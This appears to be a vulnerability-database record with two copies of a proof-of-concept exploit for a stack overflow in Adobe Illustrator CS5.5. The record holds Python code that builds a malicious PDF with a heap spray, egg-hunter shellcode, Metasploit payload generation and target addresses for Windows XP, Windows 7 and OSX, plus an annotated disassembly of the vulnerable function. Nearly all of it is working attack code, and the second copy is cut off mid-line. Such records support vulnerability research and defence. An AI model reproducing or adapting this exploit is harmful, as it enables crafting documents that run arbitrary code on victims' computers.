#XPSP3\r\n msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'\r\n baseai = baseai.replace('$HEAPSPRAY$','')\r\n jmp_addr = 0x10F00 \r\n write_addr = 0x10F00\r\n elif options.osx:\r\n code = Popen('msfpayload3.5 osx/x86/exec CMD=/Applications/Calculator.app/Contents/MacOS/Calculator EXITFUNC=process R', shell=True, stdout=PIPE).communicate()[0]\r\n baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\\x90',tail='\\xcc'+code+'\\xcc')*300 )\r\n payload = \"A\"*284\r\n payload += struct.pack(\"<L\", 0x31000100)\r\n #Write the string in octal form\r\n ai_data = baseai.replace('$PATTERN$', ''.join(['\\\\%o'%ord(i) for i in payload]))\r\n return ai_data\r\n elif options.multi:\r\n msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=seh'\r\n jmp_addr = 0x18e41111\r\n write_addr = 0xFFFF #Segfault\r\n #configure token and search code snipet\r\n search = '\\x80\\x79\\xff\\x01' #CMP BYTE [ECX-1],1\r\n search += '\\x74\\x18' #JZ fixstack\r\n search += '\\xc6\\x41\\xff\\x01' #MOV BYTE [ECX-1],1\r\n search += '\\x58' #search: pop EAX\r\n search += '\\x3D'+struct.pack('<L',token) #cmp EAX, $token\r\n search += '\\x75\\xF8' #jnz %search\r\n search += '\\x89\\xe0' #mov eax,esp \r\n search += '\\x81\\xec'+struct.pack(\"<L\",0x1000) #sub esp, 0x1000\r\n search += '\\x89\\xe5' #mov ebp,esp\r\n search += '\\xFF\\xD0' #CALL EAX\r\n ##Second crash fix stack\r\n # Search for stack signature (Tested in 15.0.0 15.0.1 15.0.2)\r\n # 00000045\r\n # 00000001\r\n # 00000000\r\n # 00000045\r\n search += '\\x81\\xc4'+struct.pack(\"<L\",0x1000) #add esp, 0x1000\r\n search += '\\x58' #POP EAX\r\n search += '\\x40' #INC EAX\r\n search += '\\x83\\xF8\\x46' #CMP EAX,46\r\n search += '\\x75\\xF9' #JNE SHORT loop\r\n ###\r\n search += '\\x58' #POP EAX\r\n search += '\\x40' #INC EAX\r\n search += '\\x83\\xF8\\x02' #CMP EAX,02\r\n search += '\\x75\\xF9' #JNE SHORT loop\r\n ###\r\n search += '\\x58' #POP EAX\r\n search += '\\x40' #INC EAX\r\n search += '\\x83\\xF8\\x01' #CMP EAX,01\r\n search += '\\x75\\xF9' #JNE SHORT loop\r\n ###\r\n search += '\\x58' #POP EAX\r\n search += '\\x40' #INC EAX\r\n search += '\\x83\\xF8\\x46' #CMP EAX,46\r\n search += '\\x75\\xF9' #JNE SHORT loop\r\n #Fix frame and return\r\n search += '\\x83\\xEC\\x1C' #SUB ESP,1C\r\n search += '\\x5d' #POP EBP\r\n search += '\\xc3' #RET\r\n\r\n baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\\x90',tail=search)*300 )\r\n else:\r\n #DEBUG\r\n def pattern(size):\r\n def _pattern():\r\n for i in xrange(ord('a'),ord('z')+1):\r\n for j in xrange(ord('0'),ord('9')+1):\r\n for k in xrange(ord('A'),ord('Z')+1):\r\n for h in xrange(ord('0'),ord('9')+1):\r\n yield chr(i)\r\n yield chr(j)\r\n yield chr(k)\r\n yield chr(h)\r\n return ''.join(list(_pattern())[:size])\r\n p = pattern(3000)\r\n ai_data = baseai.replace('($PATTERN$)', '('+p+')').replace('$HEAPSPRAY$',getXImage(1020,1024)*20)\r\n return ai_data\r\n\r\n #prepare shellcode..\r\n if options.payload:\r\n msfpayload = args[1]\r\n\r\n code = makeASCIICode(msfpayload)\r\n\r\n search = '\\x58' #search: pop EAX\r\n search += '\\x3D'+struct.pack('<L',token) #cmp EAX, $token\r\n search += '\\x75\\xF8' #jnz %search\r\n search += '\\x89\\xe0' #mov eax,esp \r\n search += '\\x89\\xe5' #mov ebp,esp\r\n search += '\\xFF\\xD0' #CALL EAX\r\n payload = search \r\n payload += 'A'*(268 - len(payload))\r\n payload += struct.pack('<L',jmp_addr) #offset 268\r\n payload += 'B'*(352 - len(payload))\r\n payload += struct.pack('<L', write_addr) #offset 352 (originally a heap address)\r\n payload += 'C'*(376 - len(payload))\r\n payload += struct.pack('<L',token) #offset 376\r\n payload += code #offset 380\r\n\r\n assert len(payload)<=0x3000, 'Payload too long!, it may hit the end of the stack'\r\n #Double check it doesn't have invalid chars...\r\n for c in search:\r\n assert not ord(c) in invalid, 'c:%s is in %s'%('%02x'%ord(c),['\\\\x%02x'%x for x in invalid])\r\n \r\n #Write the string in octal form\r\n ai_data = baseai.replace('$PATTERN$', ''.join(['\\\\%o'%ord(i) for i in payload]))\r\n\r\n #ai_data holds the ai private data to we inserted in the pdf shell\r\n return ai_data\r\n\r\ndef mkPDFShell(ai_data):\r\n #The document\r\n doc = PDFDoc()\r\n #font\r\n font = PDFDict()\r\n font.add('Name', PDFName('F1'))\r\n font.add('Subtype', PDFName('Type1'))\r\n font.add('BaseFont', PDFName('Helvetica'))\r\n #name:font map\r\n fontname = PDFDict()\r\n fontname.add('F1',font)\r\n #resources\r\n resources = PDFDict()\r\n resources.add('Font',fontname)\r\n #contents\r\n contents= PDFStream({},'BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito Pedefeon!) Tj ET')\r\n doc.add(contents)\r\n #begin illustrator bit\r\n private = PDFDict()\r\n illustrator = PDFDict()\r\n\r\n #slice the private data in 64k packs\r\n data = ai_data\r\n compress = {}\r\n chunk_size = 0xffff*20\r\n for i in xrange(0,len(data)/chunk_size+1):\r\n priv_data = PDFStream({'Filter': '/FlateDecode'},data[chunk_size*i:chunk_size*(i+1)].encode('zlib'))\r\n hsh = hashlib.md5(priv_data.stream)\r\n if not hsh.hexdigest() in compress.keys():\r\n doc.add(priv_data)\r\n ref = PDFRef(priv_data)\r\n compress[hsh.hexdigest()] = ref\r\n private.add('AIPrivateData%d'%(i+1),ref)\r\n\r\n private.add('NumBlock',PDFNum(len(data)/0xffff+1))\r\n private.add('ContainerVersion',PDFNum(15.0))\r\n private.add('CreatorVersion',PDFNum(15.0))\r\n private.add('RoundtripVersion',PDFNum(15.0))\r\n \r\n illustrator.add('LastModified',PDFString('D:20110202124811-07\\'00\\''))\r\n illustrator.add('Private',PDFRef(private))\r\n \r\n doc.add(private)\r\n doc.add(illustrator)\r\n #page\r\n page = PDFDict()\r\n page.add('Type',PDFName('Page'))\r\n page.add('Resources',resources)\r\n page.add('Contents', PDFRef(contents))\r\n page.add('PieceInfo',PDFDict({'Illustrator': PDFRef(illustrator)})) \r\n doc.add(page)\r\n #pages\r\n pages = PDFDict()\r\n pages.add('Type', PDFName('Pages'))\r\n pages.add('Kids', PDFArray([PDFRef(page)]))\r\n pages.add('Count', PDFNum(1))\r\n #add parent reference in page\r\n page.add('Parent',PDFRef(pages))\r\n doc.add(pages)\r\n #catalog\r\n catalog = PDFDict()\r\n catalog.add('Type', PDFName('Catalog'))\r\n catalog.add('Pages', PDFRef(pages))\r\n doc.add(catalog)\r\n doc.setRoot(catalog)\r\n return str(doc)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n parser = optparse.OptionParser(description='Adobe Illustrator File Format Tx operator Stack Overflow')\r\n parser.add_option('--debug', action='store_true', default=False, help='For debugging')\r\n parser.add_option('--multi', action='store_true', default=False, help='Heapspraying for multitarget')\r\n parser.add_option('--w7', action='store_true', default=False, help='For Windows7')\r\n parser.add_option('--xp', action='store_true', default=False, help='For Windows XP (generic)')\r\n parser.add_option('--osx', action='store_true', default=False, help='For OSX (tested on plain leopard)')\r\n parser.add_option('--payload', action='store_true', default=False, help=\"Metasploit payload. Ex. 'windows/exec CMD=calc.exe'\")\r\n parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')\r\n (options, args) = parser.parse_args()\r\n if not options.w7 + options.xp + options.debug + options.multi + options.osx + options.doc== 1:\r\n print 'Try --help'\r\n exit(-1)\r\n elif options.doc:\r\n print __doc__\r\n exit(0)\r\n\r\n ai_data = mkAIPrivate(options)\r\n print mkPDFShell(ai_data)\r\n\r\n#f/\r\n\r\n\r\n########################### miniPDF.py module ############################\r\n\r\n##########################################################################\r\n#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####\r\n#### http://twitter.com/feliam * http://wordpress.com/feliam ####\r\n##########################################################################\r\nimport struct\r\n\r\n#For constructing a minimal pdf file\r\n## PDF REference 3rd edition:: 3.2 Objects\r\nclass PDFObject:\r\n def __init__(self):\r\n self.n=None\r\n self.v=None\r\n def __str__(self):\r\n raise Exception(\"Fail\")\r\n\r\n## PDF REference 3rd edition:: 3.2.1 Booleans Objects\r\nclass PDFBool(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n if self.s:\r\n return \"true\"\r\n return \"false\"\r\n\r\n## PDF REference 3rd edition:: 3.2.2 Numeric Objects\r\nclass PDFNum(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"%s\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.3 String Objects\r\nclass PDFString(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"(%s)\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings\r\nclass PDFHexString(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"<\" + \"\".join([\"%02x\"%ord(c) for c in self.s]) + \">\"\r\n\r\n## A convenient type of literal Strings\r\nclass PDFOctalString(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=\"\".join([\"\\\\%03o\"%ord(c) for c in s])\r\n def __str__(self):\r\n return \"(%s)\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.4 Name Objects\r\nclass PDFName(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n self.s=s\r\n def __str__(self):\r\n return \"/%s\"%self.s\r\n\r\n## PDF REference 3rd edition:: 3.2.5 Array Objects\r\nclass PDFArray(PDFObject):\r\n def __init__(self,s):\r\n PDFObject.__init__(self)\r\n assert type(s) == type([])\r\n self.s=s\r\n def append(self,o):\r\n self.s.append(o)\r\n return self\r\n def __str__(self):\r\n return \"[%s]\"%(\" \".join([ o.__str__() for o in self.s]))\r\n\r\n## PDF REference 3rd edition:: 3.2.6 Dictionary Objects\r\nclass PDFDict(PDFObject):\r\n def __init__(self, d={}):\r\n PDFObject.__init__(self)\r\n self.dict = {}\r\n for k in d:\r\n self.dict[k]=d[k]\r\n\r\n def __iter__(self):\r\n for k in self.dict.keys():\r\n yield k\r\n\r\n def __iterkeys__(self):\r\n for k in self.dict.keys():\r\n yield k\r\n\r\n def __getitem__(self, key):\r\n return self.dict[key]\r\n \r\n def add(self,name,obj):\r\n self.dict[name] = obj\r\n\r\n def get(self,name):\r\n if name in self.dict.keys():\r\n return self.dict[name]\r\n else:\r\n return None\r\n\r\n def __str__(self):\r\n s=\"<<\"\r\n for name in self.dict:\r\n s+=\"%s %s \"%(PDFName(name),self.dict[name])\r\n s+=\">>\"\r\n return s\r\n\r\n## PDF REference 3rd edition:: 3.2.7 Stream Objects\r\nclass PDFStream(PDFDict):\r\n def __init__(self,d={},stream=\"\"):\r\n PDFDict.__init__(self,d)\r\n self.stream=stream\r\n self.filtered=self.stream\r\n self.add('Length', len(stream))\r\n self.filters = []\r\n\r\n def appendFilter(self, filter):\r\n self.filters.append(filter)\r\n self._applyFilters() #yeah every time .. so what!\r\n\r\n def _applyFilters(self):\r\n self.filtered = self.stream\r\n for f in self.filters:\r\n self.filtered = f.encode(self.filtered)\r\n if len(self.filters)>0:\r\n self.add('Length', len(self.filtered))\r\n self.add('Filter', PDFArray([f.name for f in self.filters]))\r\n #Add Filter parameters ?\r\n def __str__(self):\r\n self._applyFilters() #yeah every time .. so what!\r\n s=\"\"\r\n s+=PDFDict.__str__(self)\r\n s+=\"\\nstream\\n\"\r\n s+=self.filtered\r\n s+=\"\\nendstream\"\r\n return s\r\n\r\n## PDF REference 3rd edition:: 3.2.8 Null Object\r\nclass PDFNull(PDFObject):\r\n def __init__(self):\r\n PDFObject.__init__(self)\r\n\r\n def __str__(self):\r\n return \"null\"\r\n\r\n\r\n## PDF REference 3rd edition:: 3.2.9 Indirect Objects\r\nclass UnResolved(PDFObject):\r\n def __init__(self,n,v):\r\n PDFObject.__init__(self)\r\n self.n=n\r\n self.v=v\r\n def __str__(self):\r\n return \"UNRESOLVED(%d %d)\"%(self.n,self.v)\r\nclass PDFRef(PDFObject):\r\n def __init__(self,obj):\r\n PDFObject.__init__(self)\r\n self.obj=[obj]\r\n def __str__(self):\r\n if len(self.obj)==0:\r\n return \"null\"\r\n return \"%d %d R\"%(self.obj[0].n,self.obj[0].v)\r\n\r\n## PDF REference 3rd edition:: 3.3 Filters\r\n## Example Filter...\r\nclass FlateDecode:\r\n name = PDFName('FlateDecode')\r\n def __init__(self):\r\n pass\r\n def encode(self,stream):\r\n return zlib.compress(stream)\r\n def decode(self,stream):\r\n return zlib.decompress(stream)\r\n\r\n## PDF REference 3rd edition:: 3.4 File Structure\r\n## Simplest file structure...\r\nclass PDFDoc():\r\n def __init__(self,obfuscate=0):\r\n self.objs=[]\r\n self.info=None\r\n self.root=None\r\n def setRoot(self,root):\r\n self.root=root\r\n def setInfo(self,info):\r\n self.info=info\r\n def _add(self,obj):\r\n if obj.v!=None or obj.n!=None:\r\n raise Exception(\"Already added!!!\")\r\n obj.v=0\r\n obj.n=1+len(self.objs)\r\n self.objs.append(obj)\r\n def add(self,obj):\r\n if type(obj) != type([]):\r\n self._add(obj); \r\n else:\r\n for o in obj: \r\n self._add(o)\r\n def _header(self):\r\n return \"%PDF-1.5\\n%\\xE7\\xF3\\xCF\\xD3\\n\"\r\n def __str__(self):\r\n doc1 = self._header()\r\n xref = {}\r\n for obj in self.objs:\r\n xref[obj.n] = len(doc1)\r\n doc1+=\"%d %d obj\\n\"%(obj.n,obj.v)\r\n doc1+=obj.__str__()\r\n doc1+=\"\\nendobj\\n\" \r\n posxref=len(doc1)\r\n doc1+=\"xref\\n\"\r\n doc1+=\"0 %d\\n\"%(len(self.objs)+1)\r\n doc1+=\"0000000000 65535 f \\n\"\r\n for xr in xref.keys():\r\n doc1+= \"%010d %05d n \\n\"%(xref[xr],0)\r\n doc1+=\"trailer\\n\"\r\n trailer = PDFDict()\r\n trailer.add(\"Size\",len(self.objs)+1)\r\n if self.root == None:\r\n raise Exception(\"Root not set!\")\r\n trailer.add(\"Root\",PDFRef(self.root))\r\n if self.info:\r\n trailer.add(\"Info\",PDFRef(self.info))\r\n doc1+=trailer.__str__()\r\n doc1+=\"\\nstartxref\\n%d\\n\"%posxref\r\n doc1+=\"%%EOF\"\r\n return doc1 ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19139/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:48", "bulletinFamily": "exploit", "description": "", "modified": "2012-06-14T00:00:00", "published": "2012-06-14T00:00:00", "href": "https://packetstormsecurity.com/files/113642/Adobe-Illustrator-CS5.5-Memory-Corruption-Proof-Of-Concept.html", "id": "PACKETSTORM:113642", "type": "packetstorm", "title": "Adobe Illustrator CS5.5 Memory Corruption Proof Of Concept", "sourceData": "`########################################################################## \n#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com #### \n########################################################################## \n''' \nThe vulnerable function follows... \n---------------------------------- \n.text:004A7200 ; =============== S U B R O U T I N E ======================================= \n.text:004A7200 \n.text:004A7200 ; Attributes: bp-based frame \n.text:004A7200 \n.text:004A7200 sub_4A7200 proc near \n.text:004A7200 \n.text:004A7200 var_11C = dword ptr -11Ch \n.text:004A7200 var_118 = dword ptr -118h \n.text:004A7200 var_114 = byte ptr -114h \n.text:004A7200 var_14 = dword ptr -14h \n.text:004A7200 var_10 = dword ptr -10h \n.text:004A7200 var_C = dword ptr -0Ch \n.text:004A7200 var_4 = dword ptr -4 \n.text:004A7200 arg_0 = dword ptr 8 \n.text:004A7200 \n.text:004A7200 push ebp \n.text:004A7201 mov ebp, esp \n.text:004A7203 push 0FFFFFFFFh \n.text:004A7205 push offset loc_C3B8C0 \n.text:004A720A mov eax, large fs:0 \n.text:004A7210 push eax \n.text:004A7211 sub esp, 110h ;Make room for a 256 bytes buffer, etc \n.text:004A7217 mov eax, dword_FB3380 \n.text:004A721C xor eax, ebp \n.text:004A721E mov [ebp+var_14], eax ;Cookie! Immediately after the buffer \n.text:004A7221 push ebx \n.text:004A7222 push esi \n.text:004A7223 push edi \n.text:004A7224 push eax \n.text:004A7225 lea eax, [ebp+var_C] \n.text:004A7228 mov large fs:0, eax \n.text:004A722E mov [ebp+var_10], esp \n.text:004A7231 mov ebx, [ebp+arg_0] \n.text:004A7234 mov edi, ecx \n.text:004A7236 mov ecx, ebx \n.text:004A7238 mov [ebp+var_118], ebx \n.text:004A723E call std::basic_string::length(...) ;Original size offending size \n;(It doesn;t stop at null chars) \n.text:004A7244 mov esi, eax \n.text:004A7246 push esi \n.text:004A7247 mov ecx, ebx \n.text:004A7249 call std::basic_string::c_str(...) \n.text:004A724F push eax \n.text:004A7250 lea eax, [ebp+var_114] \n.text:004A7256 push eax \n.text:004A7257 call memcpy ;STACK OVERFLOW! (If more than 256 bytes) \n.text:004A725C lea eax, [ebp+esi+var_114] \n.text:004A7263 add esp, 0Ch \n.text:004A7266 mov [ebp+var_11C], eax \n.text:004A726C mov byte ptr [eax], 0 \n.text:004A726F mov [ebp+var_4], 0 \n.text:004A7276 lea esi, [ebp+var_114] \n.text:004A727C lea esp, [esp+0] \n.text:004A7280 \n.text:004A7280 loc_4A7280: \n.text:004A7280 cmp esi, eax \n.text:004A7282 jnb short loc_4A72B6 \n.text:004A7284 mov edx, [edi] \n.text:004A7286 mov eax, [edx+4] \n.text:004A7289 push esi \n.text:004A728A mov ecx, edi \n.text:004A728C call eax ;Iterates over the stack copied buffer \n;applying a 'locale'? character translation \n;(Invalid chars noted in exploit) \n.text:004A728E test eax, eax \n.text:004A7290 jg short loc_4A7297 \n.text:004A7292 mov eax, 1 \n.text:004A7297 \n.text:004A7297 loc_4A7297: \n.text:004A7297 add esi, eax \n.text:004A7299 mov eax, [ebp+var_11C] \n.text:004A729F jmp short loc_4A7280 \n.text:004A72AE ; --------------------------------------------------------------------------- \n.text:004A72AE \n.text:004A72AE loc_4A72AE: \n.text:004A72AE mov ebx, [ebp+var_118] \n.text:004A72B4 jmp short loc_4A72BD \n.text:004A72B6 ; --------------------------------------------------------------------------- \n.text:004A72B6 \n.text:004A72B6 loc_4A72B6: \n.text:004A72B6 mov [ebp+var_4], 0FFFFFFFFh \n.text:004A72BD \n.text:004A72BD loc_4A72BD: \n.text:004A72BD lea ecx, [ebp+var_114] \n.text:004A72C3 push ecx \n.text:004A72C4 mov ecx, ebx \n.text:004A72C6 call std::basic_string::operator=(...) ;Here, due to local values \n;corruption it is possible to \n;write a translated version of \n;our buffer to anywhere \n.text:004A72CC mov ecx, [ebp+var_C] \n.text:004A72CF mov large fs:0, ecx \n.text:004A72D6 pop ecx \n.text:004A72D7 pop edi \n.text:004A72D8 pop esi \n.text:004A72D9 pop ebx \n.text:004A72DA mov ecx, [ebp+var_14] \n.text:004A72DD xor ecx, ebp \n.text:004A72DF call sub_C27512 ;Check the cookie \n.text:004A72E4 mov esp, ebp \n.text:004A72E6 pop ebp \n.text:004A72E7 retn 4 \n.text:004A72E7 sub_4A7200 endp \n.text:004A72E7 \n \n \nf/ \n''' \n \n#Exploit PoC begins... \nfrom miniPDF import * #http://pastebin.com/LUTXSSvV \nimport zlib,struct,os,optparse,hashlib \nfrom subprocess import Popen, PIPE \n#Character translation map for the copied buffer (Reversed from function 004A72F0) \ncmap=[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, \n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, \n0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,0x29,0x2A,0x2B,0x2C,0x2D,0x2E,0x2F, \n0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3A,0x3B,0x3C,0x3D,0x3E,0x3F, \n0x40,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F, \n0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,0x5B,0x5C,0x5D,0x5E,0x5F, \n0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6C,0x6D,0x6E,0x6F, \n0x70,0x71,0x72,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7A,0x7B,0x7C,0x7D,0x7E,0x00, \n0x80,0x00,0x82,0x83,0x84,0x85,0x86,0x87,0x88,0x89,0x8A,0x8B,0x8C,0x00,0x00,0x00, \n0x00,0x91,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9A,0x9B,0x9C,0x00,0x00,0x9F, \n0x20,0xA1,0xA2,0xA3,0xA4,0xA5,0xA6,0xA7,0xA8,0xA9,0xAA,0xAB,0xAC,0x2D,0xAE,0xAF, \n0xB0,0xB1,0xB2,0xB3,0xB4,0xB5,0xB6,0xB7,0xB8,0xB9,0xBA,0xBB,0xBC,0xBD,0xBE,0xBF, \n0xC0,0xC1,0xC2,0xC3,0xC4,0xC5,0xC6,0xC7,0xC8,0xC9,0xCA,0xCB,0xCC,0xCD,0xCE,0xCF, \n0xD0,0xD1,0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0xD8,0xD9,0xDA,0xDB,0xDC,0xDD,0xDE,0xDF, \n0xE0,0xE1,0xE2,0xE3,0xE4,0xE5,0xE6,0xE7,0xE8,0xE9,0xEA,0xEB,0xEC,0xED,0xEE,0xEF, \n0xF0,0xF1,0xF2,0xF3,0xF4,0xF5,0xF6,0xF7,0xF8,0xF9,0xFA,0xFB,0xFC,0xFD,0xFE,0xFF] \ninvalid = [ i for i in xrange(0,0xff+1) if cmap[i] != i and i>0x1f] \n \n \ndef getXImage(width, height, fill='\\x90', tail='\\xcc'): \n''' \n[ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI \nArguments to the XI operator specify the location and size of the image, its \npixel bit depth, color type, and other attributes \n \nThe image matrix maps the unit square of user space, bounded by \n(0, 0) and (1, 1) in user space, to the boundary of the source image in \nimage space. \n''' \n \ndoc = '''0 A \nu \n0 O \n0 g \n0 J 0 j 1 w 10 M []0 d \n0 XR \n%AI5_File: \n%AI5_BeginRaster \n[$width$ 0 0 $height$ 0 0] 0 0 $width$ $height$ $width$ $height$ 8 1 0 0 $bin_ascii$ 0 \n%%BeginData: $size$ \nXI \n$data$ \n%%EndData \nXH \n%AI5_EndRaster \nF \nU \n''' \nbin_ascii = 1 #binary \ndoc = doc.replace('$width$','%d'%width) \ndoc = doc.replace('$height$','%d'%height) \ndoc = doc.replace('$bin_ascii$','%d'%bin_ascii) \ndoc = doc.replace('$size$','%d'%(width*height)) \n \ndata = (fill*(width*height)) \ndata = data[:width*height-len(tail)]+tail \n \nif bin_ascii == 0: \ndata = data.encode('hex') \ndata_formated = '' \nfor i in xrange(0,len(data)+62,62): \ndata_formated += '%'+data[i:i+62]+'\\n' \ndata = data_formated \ndoc = doc.replace('$data$',data) \nreturn doc \n \ndef makeASCIICode(msfpayload): \nmsfpayload = Popen('msfpayload3.5 %s R'%msfpayload, shell=True, stdout=PIPE) \nmsfencode = Popen(\"msfencode3.5 BufferRegister=EAX -e x86/alpha_mixed -b '%s' -t raw\"%''.join(['\\\\x%02x'%x for x in invalid]), \nshell=True, \nstdin=msfpayload.stdout, \nstdout=PIPE) \ncode = msfencode.communicate()[0] \nreturn code \n \ndef mkAIPrivate(options): \nbaseai = ''' \n%!PS-Adobe-3.0 \n%%Creator: Adobe Illustrator(TM) 3.2 \n%%AI8_CreatorVersion: 15.0.2 \n%AI5_FileFormat 11.0 \n%%For: (Administrator) () \n%%Title: (thafile.ai) \n%%CreationDate: 1/21/2011 12:32 PM \n%%Canvassize: 16383 \n%%BoundingBox: 29 -389 198 75 \n%%DocumentProcessColors: Black \n%%DocumentFonts: MyriadPro-Regular \n%%DocumentNeededFonts: MyriadPro-Regular \n%%DocumentNeededResources: procset Adobe_packedarray 2.0 0 \n%%+ procset Adobe_cshow 1.1 0 \n%%+ procset Adobe_customcolor 1.0 0 \n%%+ procset Adobe_typography_AI3 1.0 1 \n%%+ procset Adobe_pattern_AI3 1.0 0 \n%%+ procset Adobe_Illustrator_AI3 1.0 1 \n%AI3_ColorUsage: Color \n%AI3_TemplateBox: 298 -421 298 -421 \n%AI3_TileBox: -8.35986 -816.9453 603.6406 -24.9448 \n%AI3_DocumentPreview: None \n%%PageOrigin:-8 -817 \n%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9 \n%AI9_Flatten: 1 \n%AI12_CMSettings: 00.MS \n%%EndComments \n%%BeginProlog \n%%IncludeResource: procset Adobe_packedarray 2.0 0 \nAdobe_packedarray /initialize get exec \n%%IncludeResource: procset Adobe_cshow 1.1 0 \n%%IncludeResource: procset Adobe_customcolor 1.0 0 \n%%IncludeResource: procset Adobe_typography_AI3 1.0 1 \n%%IncludeResource: procset Adobe_pattern_AI3 1.0 0 \n%%IncludeResource: procset Adobe_Illustrator_AI3 1.0 1 \n%%EndProlog \n%%BeginSetup \n%%IncludeFont: MyriadPro-Regular \nAdobe_cshow /initialize get exec \nAdobe_customcolor /initialize get exec \nAdobe_typography_AI3 /initialize get exec \nAdobe_pattern_AI3 /initialize get exec \nAdobe_Illustrator_AI3 /initialize get exec \n[ \n39/quotesingle 96/grave 128/Euro 130/quotesinglbase/florin/quotedblbase/ellipsis \n/dagger/daggerdbl/circumflex/perthousand/Scaron/guilsinglleft/OE 145/quoteleft \n/quoteright/quotedblleft/quotedblright/bullet/endash/emdash/tilde/trademark \n/scaron/guilsinglright/oe/dotlessi 159/Ydieresis /space 164/currency 166/brokenbar \n168/dieresis/copyright/ordfeminine 172/logicalnot/hyphen/registered/macron/ring \n/plusminus/twosuperior/threesuperior/acute/mu 183/periodcentered/cedilla \n/onesuperior/ordmasculine 188/onequarter/onehalf/threequarters 192/Agrave \n/Aacute/Acircumflex/Atilde/Adieresis/Aring/AE/Ccedilla/Egrave/Eacute \n/Ecircumflex/Edieresis/Igrave/Iacute/Icircumflex/Idieresis/Eth/Ntilde \n/Ograve/Oacute/Ocircumflex/Otilde/Odieresis/multiply/Oslash/Ugrave \n/Uacute/Ucircumflex/Udieresis/Yacute/Thorn/germandbls/agrave/aacute \n/acircumflex/atilde/adieresis/aring/ae/ccedilla/egrave/eacute/ecircumflex \n/edieresis/igrave/iacute/icircumflex/idieresis/eth/ntilde/ograve/oacute \n/ocircumflex/otilde/odieresis/divide/oslash/ugrave/uacute/ucircumflex \n/udieresis/yacute/thorn/ydieresis \nTE \n%AI3_BeginEncoding: _MyriadPro-Regular MyriadPro-Regular \n[/_MyriadPro-Regular/MyriadPro-Regular 0 0 1 TZ \n%AI3_EndEncoding AdobeType \n%%EndSetup \n$HEAPSPRAY$ \nu \n0 To \n1 0 0 1 63.9058 -54.9058 0 Tp \nTP \n1 0 0 1 63.9058 -54.9058 Tm \n0 Tr \n0 O \n0 0 0 1 k \n4 M \n/_MyriadPro-Regular 12 Tf \n100 Tz \n0 Tt \n0 0 Tl \n0 Tc \n($PATTERN$) Tx 1 0 Tk \nTO \nU \n%%PageTrailer \ngsave annotatepage grestore showpage \n%%Trailer \nAdobe_Illustrator_AI3 /terminate get exec \nAdobe_pattern_AI3 /terminate get exec \nAdobe_typography_AI3 /terminate get exec \nAdobe_customcolor /terminate get exec \nAdobe_cshow /terminate get exec \nAdobe_packedarray /terminate get exec \n%%EOF \n''' \n \n \n#configure token and search code snipet \ntoken = 0x494c4546 \n \nif options.w7: \n#Win7 In w7 the environment memory is 0x10000bytes long! \nmsfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process' \nbaseai = baseai.replace('$HEAPSPRAY$','') \njmp_addr = 0x00001FF01 \nwrite_addr = 0x0001FF01 \nelif options.xp: \n#XPSP3 \nmsfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process' \nbaseai = baseai.replace('$HEAPSPRAY$','') \njmp_addr = 0x10F00 \nwrite_addr = 0x10F00 \nelif options.osx: \ncode = Popen('msfpayload3.5 osx/x86/exec CMD=/Applications/Calculator.app/Contents/MacOS/Calculator EXITFUNC=process R', shell=True, stdout=PIPE).communicate()[0] \nbaseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\\x90',tail='\\xcc'+code+'\\xcc')*300 ) \npayload = \"A\"*284 \npayload += struct.pack(\"<L\", 0x31000100) \n#Write the string in octal form \nai_data = baseai.replace('$PATTERN$', ''.join(['\\\\%o'%ord(i) for i in payload])) \nreturn ai_data \nelif options.multi: \nmsfpayload = 'windows/exec CMD=calc.exe EXITFUNC=seh' \njmp_addr = 0x18e41111 \nwrite_addr = 0xFFFF #Segfault \n#configure token and search code snipet \nsearch = '\\x80\\x79\\xff\\x01' #CMP BYTE [ECX-1],1 \nsearch += '\\x74\\x18' #JZ fixstack \nsearch += '\\xc6\\x41\\xff\\x01' #MOV BYTE [ECX-1],1 \nsearch += '\\x58' #search: pop 